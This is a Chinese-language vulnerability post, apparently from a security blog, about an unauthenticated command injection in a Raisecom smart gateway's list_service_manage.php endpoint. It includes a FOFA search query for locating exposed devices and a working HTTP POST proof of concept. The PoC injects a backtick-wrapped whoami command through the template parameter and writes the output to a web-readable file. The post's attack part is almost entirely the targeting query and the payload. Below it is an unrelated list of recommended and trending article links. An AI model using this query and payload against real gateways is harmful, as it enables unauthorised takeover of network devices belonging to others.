某智能网关 list_service_manage存在命令执行漏洞

外道・輪廻天生2024-09-12 1:06

漏洞描述

瑞斯康达多业务智能网关list_service_manage.php存在未授权命令注入漏洞,攻击者利用可获取服务器权限。

资产信息

FOFA:

复制代码 
body="/images/raisecom/back.gif"

漏洞复现

poc

复制代码 
POST /vpn/list_service_manage.php?template=%60whoami%3E%2Fwww%2Ftmp%2F1.txt%60 HTTP/1.1
Host: 
Content-Type: application/x-www-form-urlencoded


Nradius_submit=true

访问文件url+/tmp/1.txt获取命令回显

相关推荐
2301_780789663 小时前
边缘节点 DDoS 防护:CDN 节点的流量清洗与就近拦截方案
安全·web安全·ddos
江拥羡橙4 小时前
【基础-判断】HarmonyOS提供了基础的应用加固安全能力,包括混淆、加密和代码签名能力
安全·华为·typescript·harmonyos
小木话安全5 小时前
ISO27001 高阶架构 之 支持 -2
网络·安全·职场和发展·学习方法
ayaya_mana9 小时前
Nginx性能优化与安全配置:打造高性能Web服务器
运维·nginx·安全·性能优化
观北海17 小时前
网络安全蓝队常用工具全景与实战指南
安全·web安全
人衣aoa18 小时前
PG靶机 - Pelican
web安全·网络安全·渗透测试·内网渗透
lingggggaaaa18 小时前
小迪安全v2023学习笔记(六十一讲)—— 持续更新中
笔记·学习·安全·web安全·网络安全·反序列化
紫金桥软件21 小时前
紫金桥RealSCADA:国产工业大脑,智造安全基石
安全·系统安全·软件工程
柑木21 小时前
隐私计算-SecretFlow/SCQL-SCQL的两种部署模式
后端·安全·数据分析
峥嵘life21 小时前
Android 欧盟网络安全EN18031 要求对应的基本表格填写
android·安全·web安全
热门推荐
01UV安装并设置国内源02KGG转MP3工具|非KGM文件|解密音频03Qwen3-Coder 快速上手教程 | Qwen Code + Claude Code04【2025.08.06最新版】Android Studio下载、安装及配置记录(自动下载sdk)052025最新国内服务器可用docker源仓库地址大全(2025年8月更新)06蜘蛛磁力 搜索引擎大全,如何使用蜘蛛磁力查找磁力链接07TRAE Rules 实践:为项目配置 6A 工作流08全球最强模型Grok4,国内已可免费使用!(附教程)09TRAE 规则(Rules)配置指南:个人习惯、团队规范与最佳实践10GPT-5 使用限制与国内升级全攻略(免费 / Plus / Pro)【2025 最新】